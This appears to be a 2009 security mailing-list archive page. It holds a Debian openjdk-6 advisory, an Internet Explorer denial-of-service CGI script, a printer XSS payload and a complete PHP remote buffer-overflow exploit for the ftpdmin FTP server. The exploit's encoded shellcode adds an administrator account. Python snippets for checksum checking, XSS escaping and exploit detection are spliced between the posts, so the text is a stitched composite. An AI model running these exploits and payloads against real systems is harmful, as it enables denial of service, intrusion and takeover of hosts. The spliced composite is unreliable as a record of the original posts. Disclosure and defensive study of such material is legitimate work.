[SECURITY] [DSA 1769-1] New openjdk-6 packages fix arbitrary code execution

2009-04-11 Thread Florian Weimer
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1769-1                  secur...@debian.org
http://www.debian.org/security/                           Florian Weimer
April 11, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package: openjdk-6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2006-2426 CVE-2009-0581 CVE-2009-0723 CVE-2009-0733 
CVE-2009-0793 CVE-2009-1093 CVE-2009-1094 CVE-2009-1095 CVE-2009-1096 
CVE-2009-1097 CVE-2009-1098 CVE-2009-1101

Several vulnerabilities have been identified in OpenJDK, an
implementation of the Java SE platform.

Creation of large, temporary fonts could use up available disk space,
leading to a denial of service condition (CVE-2006-2426).

Several vulnerabilities existed in the embedded LittleCMS library,
exploitable through crafted images: a memory leak, resulting in a
denial of service condition (CVE-2009-0581), heap-based buffer
overflows, potentially allowing arbitrary code execution
(CVE-2009-0723, CVE-2009-0733), and a null-pointer dereference,
leading to denial of service (CVE-2009-0793).

The LDAP server implementation (in com.sun.jdni.ldap) did not properly
close sockets if an error was encountered, leading to a
denial-of-service condition (CVE-2009-1093).

The LDAP client implementation (in com.sun.jdni.ldap) allowed
malicious LDAP servers to execute arbitrary code on the client
(CVE-2009-1094).

The HTTP server implementation (sun.net.httpserver) contained an
unspecified denial of service vulnerability (CVE-2009-1101).

Several issues in Java Web Start have been addressed (CVE-2009-1095,
CVE-2009-1096, CVE-2009-1097, CVE-2009-1098).  The Debian packages
currently do not support Java Web Start, so these issues are not
directly exploitable, but the relevant code has been updated
nevertheless.

For the stable distribution (lenny), these problems have been fixed in
version 9.1+lenny2.

We recommend that you upgrade your openjdk-6 packages.

Upgrade instructions
- ------------------------------------------------------------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- ------------------------------------------------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.dsc
    Size/MD5 checksum:     2471 ac801bf95b5a70dc2872d3829662ec21
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11.orig.tar.gz
    Size/MD5 checksum: 51692912 a409bb4e935a22dcbd3529dc098c58de
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.diff.gz
    Size/MD5 checksum:   294391 8245a20f2c8886f5a21ccc584be55963

Architecture independent packages:

  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-doc_6b11-9.1+lenny2_all.deb
    Size/MD5 checksum: 12053188 aca3fd411328bdb8ebaecc32cb5dec8c
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre-lib_6b11-9.1+lenny2_all.deb
    Size/MD5 checksum:  5270602 ac2ec87d2254d75888025068260724c9
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-source_6b11-9.1+lenny2_all.deb
    Size/MD5 checksum: 26557844 4162900f514b37b46bd3445c31137038

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jdk_6b11-9.1+lenny2_alpha.deb
    Size/MD5 checksum:  8173896 624e143dcca33faeef6f18b3b2dbf091
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre_6b11-9.1+lenny2_alpha.deb
    Size/MD5 checksum:   260278 bec0a9dbb3193958ea38849920f207b1
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre-headless_6b11-9.1+lenny2_alpha.deb
    Size/MD5 checksum: 21624912 8d671cce12b85a8c2a275b27ffdefc3c
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-dbg_6b11-9.1+lenny2_alpha.deb
    Size/MD5 checksum: 34552586 9ef7d040a16bfb7cda895fe080a89639
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-demo_6b11-9.1+lenny2_alpha.deb
    Size/MD5 checksum:  2373440 4a642fce362f92b7fa55ce07b9cf64ad

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-dbg_6b11-9.1+lenny2_amd64.deb
    Size/MD5 checksum: 46891228 ac3e2086cf139e8243b38c6edbd80dc7
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jdk_6b11-9.1+lenny2_amd64.deb
    Size/MD5 checksum:  9658430 552cfaa8544f5eedd8b9fea5188e77c5
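Checking a manually fetched file against the Size/MD5 lines above, as an added example that is not part of the advisory: the script parses the listing layout (a URL line followed by its "Size/MD5 checksum:" line) and compares a downloaded file's length and digest with the advisory's values. Two entries reuse the advisory's own lines; the `example.invalid` entry and all file contents are constructed so the code runs offline. The MD5 lines only catch a corrupted or truncated download; trust that the listing itself is genuine comes from the advisory's PGP signature and, for apt, from the signed Release files.

```python
import hashlib
import re

# Two entries copied from the advisory's "Source archives" section, plus one
# constructed entry (example.invalid host, size 3, digest of the bytes b"abc")
# so the success path can be exercised without a network.
ADVISORY_LISTING = """\
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.dsc
    Size/MD5 checksum:     2471 ac801bf95b5a70dc2872d3829662ec21
  http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.diff.gz
    Size/MD5 checksum:   294391 8245a20f2c8886f5a21ccc584be55963
  http://example.invalid/pool/constructed-sample.deb
    Size/MD5 checksum:        3 900150983cd24fb0d6963f7d28e17f72
"""

CHECKSUM_RE = re.compile(r"^Size/MD5 checksum:\s+(\d+)\s+([0-9a-f]{32})$")


def parse_listing(text):
    """Map file name -> (size, md5 hex) from a DSA-style package listing.

    A URL line is followed by its "Size/MD5 checksum:" line; blank or
    whitespace-only lines between entries are ignored.
    """
    entries = {}
    pending_url = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(("http://", "https://")):
            pending_url = line
            continue
        m = CHECKSUM_RE.match(line)
        if m and pending_url:
            name = pending_url.rsplit("/", 1)[-1]
            entries[name] = (int(m.group(1)), m.group(2))
            pending_url = None
    return entries


def verify_file(name, data, entries):
    """Return (ok, reason) for bytes `data` claimed to be the listed file `name`.

    Size is checked first so a truncated or padded download is reported as
    such rather than as a bare digest mismatch.
    """
    if name not in entries:
        return False, "file is not listed in the advisory"
    size, digest = entries[name]
    if len(data) != size:
        return False, f"size mismatch: got {len(data)} bytes, advisory says {size}"
    actual = hashlib.md5(data).hexdigest()
    if actual != digest:
        return False, f"MD5 mismatch: got {actual}, advisory says {digest}"
    return True, "size and MD5 match the advisory"


if __name__ == "__main__":
    listing = parse_listing(ADVISORY_LISTING)
    for name, blob in [("constructed-sample.deb", b"abc"),
                       ("openjdk-6_6b11-9.1+lenny2.dsc", b"x" * 2471)]:
        print(name, verify_file(name, blob, listing))
```

For a real run, replace the constructed blob with `open(path, "rb").read()` of the file fetched with `wget`, and only pass it to `dpkg -i` when `verify_file` returns `True`.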
  

[BMSA 2009-04] Remote DoS in Internet Explorer

2009-04-11 Thread Nam Nguyen
BLUE MOON SECURITY ADVISORY 2009-04
===


:Title: Remote Denial of Service in Internet Explorer
:Severity: Moderate
:Reporter: Blue Moon Consulting
:Products: Internet Explorer 7 and 8
:Fixed in: --


Description
---

We could not find out the definitive description for Internet Explorer from the
Microsoft website. This is our own understanding of the application: Internet
Explorer is a web browser.

We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8.
When visiting a malicious page, the browser may freeze indefinitely and killing it
in Task Manager is required. With IE8's default settings, killing the tab
process simply launches another process and goes to the same malicious page,
hence repeating the cycle. The root cause is unknown to us. We suspect that it
is related to the display of unprintable characters on Windows XP and Vista.
The same problem does not occur in Windows 7.

Microsoft has classified this vulnerability as a stability (not security) issue 
and will be addressing it in the next version of the application.

Workaround
--

There is no workaround.

Fix
---

This problem is to be fixed in the next version of Internet Explorer.

Disclosure
--

Blue Moon Consulting adapts `RFPolicy v2.0
<http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:

  March 19, 2009: Initial contact sent to sec...@microsoft.com.

:Vendor response:

  March 19, 2009: Tony replied stating the preference for PGP communication.

:Further communication:

  March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME
  format.

  March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and
  informed us of a new case manager, Jack.

  March 21, 2009: We further reported that IE 8 was affected by the same bug,
  in PGP MIME format.

  March 30, 2009: We asked if Microsoft had received our PoC.

  March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could
  not reproduce the behavior of this bug.

  April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista
  Business. Sent in PGP MIME format.

  April 01, 2009: Jack said the email was stripped out and asked us to resend.

  April 02, 2009: We resent the last email in plain text.

  April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in
  no case did Internet Explorer hang indefinitely.

  April 06, 2009: We sent Jack a video clip, in PGP MIME format.

  April 06, 2009: Jack asked us to resend because the email was stripped again.

  April 07, 2009: We resent the clip in plain text to Jack.

  April 09, 2009: Jack acknowledged the receipt and let us know the bug would
  be fixed in the next version of Internet Explorer.

  April 09, 2009: We asked for a confirmation of bug classification.

  April 09, 2009: Jack confirmed this bug was classified as stability, instead
  of a security issue. We therefore decided to release this advisory to the
  public.

:Public disclosure: April 11, 2009

:Exploit code: The following CGI script causes IE to hang indefinitely.

::

  #!C:/python25/python
  import sys
  import random

  CHAR_SET = [chr(x) for x in range(0x20)]
  CHAR_SET += [chr(x) for x in range(128, 256)]

  def send_file():
      l = 80 + 4096
      print "Content-Type: text/plain"
      print "Content-Length: %d" % l
      print "Cache-Control: no-cache, no-store, must-revalidate"
      # this is not standardized, but use it anyway
      print "Pragma: no-cache"
      print
      # bypass IE download dialog
      sys.stdout.write("a" * 4096)
      # print junks
      for i in xrange(l):
          sys.stdout.write(random.choice(CHAR_SET))
      sys.exit()

  send_file()


Disclaimer
--

The information provided in this advisory is provided as is without warranty 
of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either 
express or implied, including the warranties of merchantability and fitness for 
a particular purpose. Your use of the information on the advisory or materials 
linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd 
reserves the right to change or update this notice at any time.

Cheers
-- 
Nam Nguyen
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn


In Response to Bid 34130 Invalid

2009-04-11 Thread Aditya K Sood

The observed behavior is explained at the link below:

http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html

This vulnerability persists in newer versions of Google Chrome too.


HP Deskjet 6800 XSS in Web Interface

2009-04-11 Thread mcyr2
A Cross-site scripting input validation error has been identified in the web
interface of the HP Deskjet 6800 printer family.  By sending a string such as
<script>alert("found XSS on this page")</script> via a POST request to
/refresh_rate.htm the resulting error page will execute the script.



Verified on Deskjet 6840 firmware version: XF1M131A, but the firmware seems to 
be generic to the 6800 family, so possibly the entire family is vulnerable.



Vulnerability Timeline:

3/21/09: Vendor notification via email

3/21/09: Vendor upgrades ticket to next level of support

3/31/09: Vendor's Advanced Support Group replies: the issue that you are
experiencing is due to faulty firmware of the printer and as a result the
printer needs to be serviced from a HP authorized service center.

3/31/09: I reply asking what firmware version fixes the issue and ask if this
vulnerability has been reported previously

3/31/09: Vendor replies: I regret to inform you that there is no specific
firmware is available for your printer. As the issue is related to the hardware
of the printer, it is beyond the scope of our email support and needs the
personal attention of a technician. I would suggest you to get the printer
serviced at the nearest HP Authorised service centre. For your convenience I
provided below information to locate the nearest HP Authorised service centre.
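The defect behind this report is a reflected value written into an HTML error page without output encoding. As an added example that is not the printer's firmware code or anything from the post, the snippet below puts the unescaped pattern beside two fixes: escaping the value for an HTML text context and allow-list validation of the field itself. The page wording and the idea that the POSTed field is the refresh interval are assumptions; the post only names the /refresh_rate.htm endpoint and the payload string.

```python
import html

# The string quoted in the report, used here as a constructed test value.
REPORTED_PAYLOAD = '<script>alert("found XSS on this page")</script>'


def render_error_vulnerable(submitted):
    """Error page that reflects the POSTed value verbatim (the pattern the report describes).

    Page wording and the assumption that the field is a refresh interval are
    the example's own; the report names only the endpoint.
    """
    return ("<html><body><h1>Error</h1>"
            f"<p>Invalid refresh rate: {submitted}</p></body></html>")


def render_error_fixed(submitted):
    """Same page with the value escaped for an HTML text context.

    html.escape(quote=True) turns & < > " ' into entities, so the reflected
    string is displayed as text instead of being parsed as markup.
    """
    return ("<html><body><h1>Error</h1>"
            f"<p>Invalid refresh rate: {html.escape(submitted, quote=True)}</p>"
            "</body></html>")


def parse_refresh_rate(submitted):
    """Allow-list validation: a refresh interval is a small positive integer.

    Returns the int, or None to reject. Rejected input must still go through
    render_error_fixed if it is echoed back, since validation and output
    encoding address different failures.
    """
    if submitted.isascii() and submitted.isdigit() and 1 <= int(submitted) <= 3600:
        return int(submitted)
    return None


def reflects_live_script(page):
    """Crude response check a tester would run: did a <script> tag survive unescaped?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable:", reflects_live_script(render_error_vulnerable(REPORTED_PAYLOAD)))
    print("fixed:     ", reflects_live_script(render_error_fixed(REPORTED_PAYLOAD)))
    print("validated: ", parse_refresh_rate("30"), parse_refresh_rate(REPORTED_PAYLOAD))
```

The same escaping rule applies to every place the device echoes client input, not just this one error page; for an embedded web server with no templating library, a single escape helper applied at every reflection point is the practical fix.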


ftpdmin v. 0.96 RNFR remote buffer overflow exploit

2009-04-11 Thread nospam
<?php
/*
   ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
   by Nine:Situations:Group::surfista
   software site: http://www.sentex.net/~mwandel/ftpdmin/
   our site: http://retrogod.altervista.org/

   bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
   We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to
   the second memory region.
   We have a very small set of chars that we can use, RNFR (Rename From) command
   accepts pathnames as argument, so characters whose integer representations are
   in the range from zero through 31 and reserved chars are not allowed!
*/

error_reporting(7);
$ftp_server = "192.168.0.1";
$ftp_user   = "anonymous";
$ftp_pass   = "a...@email.com";

function ftp_cmd($cmd){
    global $conn_id;
    echo "- ".$cmd."\n";
    $buff=ftp_raw($conn_id,$cmd);
}

#WinExec shellcode of mine, encoded with the alpha2 tool by SkyLined, adds
#a surfista admin user with pass "pass"
#contains hardcoded address, re-encode command:
#alpha2 esp < shdmp.txt

$scode="TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
       "Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5".
       "prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN".
       "w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw".
       "4gPqcpupr3VQybSrTE1kOA";
#do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space
$code ="TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
       "NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA";
if (strlen($scode) > 272) {die("[!] shellcode too large!");}
$conn_id = ftp_connect($ftp_server) or die("(!) Unable to connect to $ftp_server");
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
    echo "(*) Connected as $ftp_u...@$ftp_server\n";
} else {
    die("(!) Unable to connect as $ftp_user\n");
}
$jnk = str_repeat("\x66",272 - strlen($scode));
$eip="\x44\x3a\x41\x7e"; //0x7E413A44  jmp esp, user32.dll xp sp3
$jnk_ii = str_repeat("\x66",119 - strlen($code));
$bof=$scode.$jnk.$eip.$code.$jnk_ii;
$boom="RNFR ".str_repeat("x",0x0096);
ftp_cmd($boom);
$boom="RNFR ".$bof;
ftp_cmd($boom);
$boom="RNFR ".str_repeat("x",0x0208);
ftp_cmd($boom);
ftp_close($conn_id);
echo "(*) Done !\n";
?>

url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html
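Seen from the server or a network monitor, the traffic described in the post has a simple shape: RNFR arguments far longer than any pathname, made of long runs of a single byte. The detection below is an added example and not part of the post or of ftpdmin; the "client command argument" log layout, the thresholds and the sample lines are all constructed, and the only thing taken from the post is that a legitimate RNFR argument is a modest-length pathname drawn from printable characters. The sample's argument lengths mirror the sizes discussed above (0x96, 272 + 119, 0x208) so the rules can be checked against them.

```python
import re
from itertools import groupby

# Constructed control-channel log lines in a "client command argument" layout.
# They are not from ftpdmin or any real server; the overlong arguments only
# mirror the lengths discussed in the post (0x96 = 150, 272 + 119, 0x208 = 520).
SAMPLE_LOG = [
    "192.0.2.10 USER anonymous",
    "192.0.2.10 RNFR reports/q1.txt",
    "192.0.2.10 RNTO reports/q1-final.txt",
    "192.0.2.77 USER anonymous",
    "192.0.2.77 RNFR " + "x" * 0x96,
    "192.0.2.77 RNFR " + "A" * 272 + "ZZZZ" + "B" * 119,
    "192.0.2.77 RNFR " + "x" * 0x208,
]

MAX_PATH_ARG = 255   # longest pathname argument a legitimate client should send
MAX_RUN = 64         # one byte repeated this often is filler, not a filename
LINE_RE = re.compile(r"^(?P<src>\S+)\s+(?P<cmd>[A-Za-z]{3,4})(?:\s+(?P<arg>.*))?$")


def inspect_command(line):
    """Return (src, cmd, [findings]) for one log line, or None if it cannot be parsed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, cmd = m.group("src"), m.group("cmd").upper()
    arg = m.group("arg") or ""
    findings = []
    if len(arg) > MAX_PATH_ARG:
        findings.append(f"argument is {len(arg)} bytes (limit {MAX_PATH_ARG})")
    if any(not 0x20 <= ord(c) <= 0x7E for c in arg):
        findings.append("argument contains bytes outside printable ASCII")
    # Longest run of one repeated byte; groupby on "" yields nothing, hence default=0.
    longest = max((sum(1 for _ in g) for _, g in groupby(arg)), default=0)
    if longest >= MAX_RUN:
        findings.append(f"run of {longest} identical bytes")
    return src, cmd, findings


def scan(lines):
    """Return (src, cmd, findings) for every line that triggered at least one rule."""
    hits = []
    for line in lines:
        parsed = inspect_command(line)
        if parsed and parsed[2]:
            hits.append(parsed)
    return hits


def sources_to_block(hits, threshold=2):
    """Sources with at least `threshold` flagged commands, sorted, for an alert or ACL."""
    counts = {}
    for src, _, _ in hits:
        counts[src] = counts.get(src, 0) + 1
    return sorted(s for s, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for src, cmd, findings in scan(SAMPLE_LOG):
        print(src, cmd, "; ".join(findings))
    print("block:", sources_to_block(scan(SAMPLE_LOG)))
```

The length rule alone would miss the first overlong-but-under-256-byte command, which is why the repeated-byte rule is kept alongside it; on a real server the same checks belong in the command parser, where rejecting an argument above the path limit before it is copied removes the overflow rather than merely logging it.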